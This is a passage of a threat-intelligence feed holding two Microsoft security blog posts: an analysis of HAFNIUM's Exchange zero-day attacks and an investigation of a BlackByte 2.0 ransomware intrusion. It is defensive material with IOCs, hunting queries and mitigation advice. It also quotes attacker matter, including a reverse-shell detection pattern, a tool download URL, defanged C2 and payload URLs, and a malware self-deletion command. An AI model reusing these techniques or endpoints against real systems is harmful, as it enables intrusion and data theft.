"impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mmpc", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:28:51", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n![Screenshot of web shell code](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig1.png)\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig2-procdump.png)\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fg3-7zip.png)\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig4-Exchange-PowerShell.png)\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig4-Nishang.png)\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig5-PowerCat.png)\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mmpc", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MMPC:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-18T21:01:53", "description": "As ransomware attacks continue to grow in number and sophistication, threat actors can quickly impact business operations if organizations are not well prepared. In a recent investigation by Microsoft Incident Response (previously known as Microsoft Detection and Response Team \u2013 DART) of an intrusion, we found that the threat actor progressed through the full attack chain, from initial access to impact, in less than five days, causing significant business disruption for the victim organization.\n\nOur investigation found that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives. These techniques included:\n\n * Exploitation of unpatched internet-exposed Microsoft Exchange Servers\n * Web shell deployment facilitating remote access\n * Use of living-off-the-land tools for persistence and reconnaissance\n * Deployment of Cobalt Strike beacons for command and control (C2)\n * Process hollowing and the use of vulnerable drivers for defense evasion\n * Deployment of custom-developed backdoors to facilitate persistence\n * Deployment of a custom-developed data collection and exfiltration tool\n![BlackByte 2.0 ransomware attack chain by order of stages: initial access and privilege escalation, persistence and command and control, reconnaissance, credential access, lateral movement, data staging and exfiltration, and impact. ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/07/BlackByte-attack-flow-diagram-1024x514.webp)Figure 1. BlackByte 2.0 ransomware attack chain\n\nIn this blog, we share details of our investigation into the end-to-end attack chain, exposing security weaknesses that the threat actor exploited to advance their attack. As we learned from Microsoft\u2019s tracking of ransomware attacks and the [cybercriminal economy](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) that enables them, disrupting common attack patterns could stop many of the attacker activities that precede ransomware deployment. This case highlights that common security hygiene practices go a long way in preventing, identifying, and responding to malicious activity as early as possible to mitigate the impact of ransomware attacks. We encourage organizations to follow the outlined mitigation steps, including ensuring that internet-facing assets are up to date and configured securely. We also share indicators of compromise, detection details, and hunting guidance to help organizations identify and respond to these attacks in their environments. \n\n## Forensic analysis\n\n### Initial access and privilege escalation\n\nTo obtain initial access into the victim\u2019s environment, the threat actor was observed exploiting the [ProxyShell vulnerabilities](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 on unpatched Microsoft Exchange Servers. The exploitation of these vulnerabilities allowed the threat actor to:\n\n * Attain system-level privileges on the compromised Exchange host\n * Enumerate LegacyDN of users by sending Autodiscover requests, including SIDs of users\n * Construct a valid authentication token and use it against the Exchange PowerShell backend\n * Impersonate domain admin users and create a web shell by using the _New-MailboxExportRequest_ cmdlet\n * Create web shells to obtain remote control on affected servers\n\nThe threat actor was observed operating from the following IP to exploit ProxyShell and access the web shell:\n\n * 185.225.73[.]244\n\n### Persistence\n\n**Backdoor**\n\nAfter gaining access to a device, the threat actor created the following registry run keys to run a payload each time a user signs in:\n\nRegistry key| Value name| Value data \n---|---|--- \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\Users\\user\\Downloads\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\temp\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\systemtest\\api-system.png,Default \n \nThe file _api-msvc.dll _(SHA-256: 4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e) was determined to be a backdoor capable of collecting system information, such as the installed antivirus products, device name, and IP address. This information is then sent via HTTP POST request to the following C2 channel:\n\n * _hxxps://myvisit[.]alteksecurity[.]org/t_\n\nThe organization was not using Microsoft Defender Antivirus, which detects this malware as Trojan:Win32/Kovter!MSR, as the primary antivirus solution, and the backdoor was allowed to run.\n\nAn additional file, _api-system.png_, was identified to have similarities to _api-msvc.dll_. This file behaved like a DLL, had the same default export function, and also leveraged run keys for persistence.\n\n**Cobalt Strike Beacon**\n\nThe threat actor leveraged Cobalt Strike to achieve persistence. The file _sys.exe _(SHA-256: 5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103), detected by Microsoft Defender Antivirus as Trojan:Win64/CobaltStrike!MSR, was determined to be a Cobalt Strike Beacon and was downloaded directly from the file sharing service _temp[.]sh_:\n\n * _hxxps://temp[.]sh/szAyn/sys.exe_\n\nThis beacon was configured to communicate with the following C2 channel:\n\n * 109.206.243[.]59:443\n\n**AnyDesk******\n\nThreat actors leverage legitimate remote access tools during intrusions to blend into a victim network. In this case, the threat actor utilized the remote administration tool AnyDesk, to maintain persistence and move laterally within the network. AnyDesk was installed as a service and was run from the following paths:\n\n * _C:\\systemtest\\anydesk\\AnyDesk.exe_\n * _C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe_\n * _C:\\Scripts\\AnyDesk.exe_\n\nSuccessful connections were observed in the AnyDesk log file _ad_svc.trace_ involving anonymizer service IP addresses linked to TOR and MULLVAD VPN, a common technique that threat actors employ to obscure their source IP ranges.\n\n### Reconnaissance\n\nWe found the presence and execution of the network discovery tool NetScan being used by the threat actor to perform network enumeration using the following file names:\n\n * _netscan.exe _(SHA-256:1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n * _netapp.exe _(SHA-256:1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n\nAdditionally, execution of AdFind (SHA-256: f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e), an Active Directory reconnaissance tool, was observed in the environment.\n\n### Credential access\n\nEvidence of likely usage of the credential theft tool Mimikatzwas also uncovered through the presence of a related log file _mimikatz.log_. Microsoft IR assesses that Mimikatz was likely used to attain credentials for privileged accounts.\n\n### Lateral movement\n\nUsing compromised domain admin credentials, the threat actor used Remote Desktop Protocol (RDP) and PowerShell remoting to obtain access to other servers in the environment, including domain controllers.\n\n### Data staging and exfiltration\n\nIn one server where Microsoft Defender Antivirus was installed, a suspicious file named _explorer.exe_ was identified, detected as Trojan:Win64/WinGoObfusc.LK!MT, and quarantined. However, because tamper protection wasn\u2019t enabled on this server, the threat actor was able to disable the Microsoft Defender Antivirus service, enabling the threat actor to run the file using the following command:\n\nexplorer.exe P@$$w0rd\n\nAfter reverse engineering_ explorer.exe_, we determined it to be ExByte, a GoLang-based tool developed and commonly used in BlackByte ransomware attacks for collection and exfiltration of files from victim networks. This tool is capable of enumerating files of interest across the network and, upon execution, creates a log file containing a list of files and associated metadata. Multiple log files were uncovered during the investigation in the path:\n\n * _C:\\Exchange\\MSExchLog.log_\n\nAnalysis of the binary revealed a list of file extensions that are targeted for enumeration.\n\n![Figure-2.-Binary-analysis-showing-file-extensions-enumerated-by-explorer.exe_](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/07/Figure-2.-Binary-analysis-showing-file-extensions-enumerated-by-explorer.exe_.jpg)Figure 2. Binary analysis showing file extensions enumerated by _explorer.exe_\n\nForensic analysis identified a file named _data.txt_ that was created and later deleted after ExByte execution. This file contained obfuscated credentials that ExByte leveraged to authenticate to the popular file sharing platform Mega NZ using the platform\u2019s API at:\n\n * _hxxps://g.api.mega.co[.]nz_\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/07/Figure-3.-Binary-analysis-showing-explorer.exe-functionality-for-connecting-to-file-sharing-service-MEGA-NZ.webp)Figure 3. Binary analysis showing explorer.exe functionality for connecting to file sharing service MEGA NZ\n\nWe also determined that this version of Exbyte was crafted specifically for the victim, as it contained a hardcoded device name belonging to the victim and an internal IP address.\n\n**ExByte execution flow**\n\nUpon execution, ExByte decodes several strings and checks if the process is running with privileged access by reading _\\\\\\\\.\\PHYSICALDRIVE0_:\n\n * If this check fails, _ShellExecuteW_ is invoked with the _IpOperation_ parameter _RunAs_, which runs _explorer.exe_ with elevated privileges.\n\nAfter this access check, _explorer.exe_ attempts to read the _data.txt_ file in the current location:\n\n * If the text file doesn\u2019t exist, it invokes a command for self-deletion and exits from memory:\n \n \n C:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 10 > nul & Del <PATH>\\explorer.exe /F /Q\n \n\n * If _data.txt_ exists, _explorer.exe_ reads the file, passes the buffer to Base64 decode function, and then decrypts the data using the key provided in the command line. The decrypted data is then parsed as JSON below and fed for login function:\n \n \n {\n \t\u201ca\u201d:\u201dus0\u201d,\n \t\u201cuser\u201d:\u201d<CONTENT FROM data.txt>\u201d\n }\n \n\nFinally, it forms a URL for sign-in to the API of the service MEGA NZ:\n\n * _hxxps://g.api.mega.co[.]nz/cs?id=1674017543_\n\n### Data encryption and destruction\n\nOn devices where files were successfully encrypted, we identified suspicious executables, detected by Microsoft Defender Antivirus as Trojan:Win64/BlackByte!MSR, with the following names:\n\n * _wEFT.exe_\n * _schillerized.exe_\n\nThe files were analyzed and determined to be BlackByte 2.0 binaries responsible for encryption across the environment. The binaries require an 8-digit key number to encrypt files.\n\nTwo modes of execution were identified:\n\n * When the _-s_ parameter is provided, the ransomware self-deletes and encrypts the machine it was executed on.\n * When the _-a_ parameter is provided, the ransomware conducts enumeration and uses an Ultimate Packer Executable (UPX) packed version of PsExec to deploy across the network. Several domain admin credentials were hardcoded in the binary, facilitating the deployment of the binary across the network.\n\nDepending on the switch (_-s_ or _-a_), execution may create the following files:\n\n * _C:\\SystemData\\M8yl89s7.exe_ (UPX-packed PsExec with a random name; SHA-256: ba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f)\n * _C:\\SystemData\\wEFT.exe_ (Additional BlackByte binary)\n * 